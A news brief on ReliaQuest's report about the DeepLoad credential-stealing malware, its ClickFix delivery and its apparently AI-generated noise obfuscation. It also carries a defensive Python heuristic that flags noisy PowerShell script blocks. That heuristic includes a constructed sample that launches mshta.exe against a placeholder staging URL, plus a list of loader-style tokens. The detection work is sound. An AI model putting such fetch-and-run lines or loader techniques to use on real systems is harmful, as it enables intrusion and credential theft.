Dive Brief:
- Hackers may be using AI to hide malware that steals user credentials from enterprise environments as part of an alarming new attack campaign, according to ReliaQuest.
- The malware’s combination of AI-enabled obfuscation and delivery via the stealthy “ClickFix” technique makes it a potent threat to watch out for, researchers said in a report published on Monday.
- ReliaQuest urged organizations to perform ongoing behavioral analysis of computers on their networks to catch the malware in the act, given that its fileless operations can bypass more traditional static defenses.
Dive Insight:
The malware described in the report, dubbed DeepLoad, represents a toxic combination of trends in cybersecurity: the reliance on the ClickFix delivery method and the increasing use of AI as an obfuscation technique.
Over the past few years, the ClickFix technique — which involves tricking users into running commands in Windows Terminal or Windows PowerShell that grant the intruders broad access — has surged in popularity as a delivery method for malware. Because the technique relies on legitimate users performing what look like ordinary, safe actions, security software has a hard time detecting it.
With the right PowerShell command, the results can be severe.
“In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader,” ReliaQuest said. “From there, mshta.exe, a legitimate Windows utility often abused for remote script execution, reached the attacker’s staging infrastructure and pulled down an obfuscated PowerShell loader.”
That loader contained “thousands of meaningless variable assignments that resemble routine scripting,” and researchers said this “busy” design was meant to hide the loader’s malicious functionality inside the noise.
ReliaQuest considers it unlikely that a human manually produced the vast quantity of gibberish code.
“Template-based tools are possible, but the quality and consistency we observed likely point to AI,” researchers wrote. “If so, what once may have taken days to build could probably be produced in an afternoon. It’s also a realistic possibility that AI helped write the attack logic itself, not just the noise around it.”
Static malware detection tools buckle under such a volume of code, researchers said. “There’s simply too much noise to sift through.”
Instead, ReliaQuest recommends that organizations use a Microsoft security feature called PowerShell Script Block Logging, which records the content of PowerShell script blocks as they execute.
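As an added illustration that is not from the ReliaQuest report, the following triage heuristic works on the script blocks that Script Block Logging captures: it counts how many assigned variables are never read, strips those dead assignments to expose the live code, and flags blocks that combine heavy noise with loader-style tokens. The sample block, its variable names and its staging URL are constructed, not observed DeepLoad code.

```python
import re

# Constructed sample resembling the "busy" loader described above: dozens of dead
# variable assignments wrapped around a short live payload. Not real DeepLoad code.
SAMPLE_BLOCK = "\n".join(
    [f"$tmp{i} = {i * 7}" for i in range(40)]
    + ["$h = 'mshta.exe'",
       "$u = 'http://staging.example/loader.hta'",  # placeholder URL
       "Start-Process $h $u"]
)

# Simple PowerShell assignment on its own line: "$name = ..." (not "==", "+=", etc.)
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=(?![=])", re.MULTILINE)
# Tokens a loader of this kind tends to need; tuned for the campaign described above.
LIVE_TOKENS = ("mshta", "start-process", "register-scheduledtask",
               "schtasks", "invoke-expression", "iex ")


def _dead_variables(script: str) -> tuple[set, list]:
    """Return (set of variables written but never read, list of all assignments)."""
    assigned = ASSIGN_RE.findall(script)
    dead = set()
    for name in set(assigned):
        # Every "$name" occurrence; if it equals the write count, it is never read.
        uses = len(re.findall(r"\$" + re.escape(name) + r"\b", script))
        if uses == assigned.count(name):
            dead.add(name)
    return dead, assigned


def dead_assignment_ratio(script: str) -> tuple[int, int, float]:
    """Return (distinct assigned variables, dead ones, dead/assigned ratio)."""
    dead, assigned = _dead_variables(script)
    names = set(assigned)
    return len(names), len(dead), (len(dead) / len(names) if names else 0.0)


def strip_dead_assignments(script: str) -> str:
    """Drop lines that only assign a never-read variable, leaving the live code."""
    dead, _ = _dead_variables(script)
    kept = []
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not (m and m.group(1) in dead):
            kept.append(line)
    return "\n".join(kept)


def triage_script_block(script: str, min_assign: int = 20, min_ratio: float = 0.8) -> dict:
    """Flag a logged script block as suspicious when it is mostly noise and contains loader tokens."""
    n, dead, ratio = dead_assignment_ratio(script)
    lowered = script.lower()
    hits = [t.strip() for t in LIVE_TOKENS if t in lowered]
    noisy = n >= min_assign and ratio >= min_ratio
    return {"assigned": n, "dead": dead, "dead_ratio": round(ratio, 3),
            "noisy": noisy, "live_tokens": hits, "suspicious": noisy and bool(hits)}
```

Thresholds are illustrative; tune them against your own baseline of legitimate administrative scripts before alerting on them.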
ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operating system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.
Because the malware can collect both stored credentials and passwords that users enter after the compromise, ReliaQuest urged compromised organizations to change all passwords that an affected machine can access.
The security firm also said organizations need to watch for hackers’ abuse of the Windows Management Instrumentation event subscription feature. WMI subscriptions can execute code based on predefined triggers, which can have beneficial uses, but because most security teams don’t check for rogue subscriptions when remediating malware infections, ReliaQuest said, hackers are abusing the feature to redeploy DeepLoad after remediation.